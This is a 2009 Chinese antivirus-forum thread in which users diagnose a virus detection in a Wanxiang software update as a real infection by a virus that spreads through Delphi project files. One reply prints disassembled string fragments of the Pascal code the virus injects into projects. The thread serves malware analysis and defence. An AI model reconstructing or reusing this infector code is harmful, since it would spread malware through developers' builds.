我是LAJI我怕谁 - 2009-9-13 13:40:00
今天用瑞星网站上的免费查杀发现的。万象的升级包和任子行的客户端报病毒。是误报还是病毒?
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
aaccbbdd - 2009-9-13 13:41:00
将文件发上来看看
可能是文件被病毒感染
win32开头表示感染型病毒
我是LAJI我怕谁 - 2009-9-13 13:47:00
论坛支持多大的附件呀?这个文件有9.8M,是不是得分卷压缩呀?
aaccbbdd - 2009-9-13 13:55:00
我是LAJI我怕谁 - 2009-9-13 14:12:00
我是LAJI我怕谁 - 2009-9-13 14:51:00
UPUP
aaccbbdd - 2009-9-13 15:00:00
找人查看中
可能是梦魇病毒.............
可能需要联系万象
我是LAJI我怕谁 - 2009-9-13 15:10:00
好的,我等。。。。。
aaccbbdd - 2009-9-13 15:14:00
也不要干等
建议同时联系万象的人员
newcenturymoon - 2009-9-13 23:15:00
不是误报 那个文件被感染了
这个病毒感染delphi的工程文件
newcenturymoon - 2009-9-13 23:18:00
CODE:00406DEC aUsesWindowsVar db 'uses windows; var sc:array[1..24] of string=(',0
CODE:00406DEC ; DATA XREF: DATA:off_4240B8�o
CODE:00406E1A align 4
CODE:00406E1C _str_function_x_s_st dd 0FFFFFFFFh ; _top
CODE:00406E1C ; DATA XREF: DATA:off_4240BC�o
CODE:00406E1C dd 80 ; Len
CODE:00406E1C db 'function x(s:string):string;var i:integer;begin for i:=1 to lengt'; Text
CODE:00406E1C db 'h(s) do if s',0 ; Text
CODE:00406E75 align 4
CODE:00406E78 _str___36_then_s_i__ dd 0FFFFFFFFh ; _top
CODE:00406E78 ; DATA XREF: DATA:004240C0�o
CODE:00406E78 dd 80 ; Len
CODE:00406E78 db '=#36 then s:=#39;result:=s;end;procedure re(s,d,e:string);var '; Text
CODE:00406E78 db 'f1,f2:textfile;',0 ; Text
CODE:00406ED1 align 4
CODE:00406ED4 _str_h_cardinal_f_ST dd 0FFFFFFFFh ; _top
CODE:00406ED4 ; DATA XREF: DATA:004240C4�o
CODE:00406ED4 dd 80 ; Len
CODE:00406ED4 db 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3'; Text
CODE:00406ED4 db ':FILETIME;begin',0 ; Text
CODE:00406F2D align 10h
CODE:00406F30 _str_h__CreateFile_p dd 0FFFFFFFFh ; _top
CODE:00406F30 ; DATA XREF: DATA:004240C8�o
CODE:00406F30 dd 80 ; Len
CODE:00406F30 db 'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then be'; Text
CODE:00406F30 db 'gin CloseHandle',0 ; Text
CODE:00406F89 align 4
CODE:00406F8C _str__h__exit_end__$ dd 0FFFFFFFFh ; _top
CODE:00406F8C ; DATA XREF: DATA:004240CC�o
CODE:00406F8C dd 80 ; Len
CODE:00406F8C db '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then '; Text
CODE:00406F8C db 'exit;assignfile',0 ; Text
CODE:00406FE5 align 4
CODE:00406FE8 _str__f2_d_$pas$__re dd 0FFFFFFFFh ; _top
CODE:00406FE8 ; DATA XREF: DATA:004240D0�o
CODE:00406FE8 dd 80 ; Len
CODE:00406FE8 db '(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);'; Text
CODE:00406FE8 db 'exit;end; while',0 ; Text
CODE:00407041 align 4
CODE:00407044 _str_not_eof_f1__do_ dd 0FFFFFFFFh ; _top
CODE:00407044 ; DATA XREF: DATA:004240D4�o
CODE:00407044 dd 80 ; Len
CODE:00407044 db 'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implem'; Text
CODE:00407044 db 'entation$,s)<>0',0 ; Text
CODE:0040709D align 10h
病毒在delphi工程文件中插入的代码
我是LAJI我怕谁 - 2009-9-14 0:59:00
谢谢。
© 2000 - 2025 Rising Corp. Ltd.
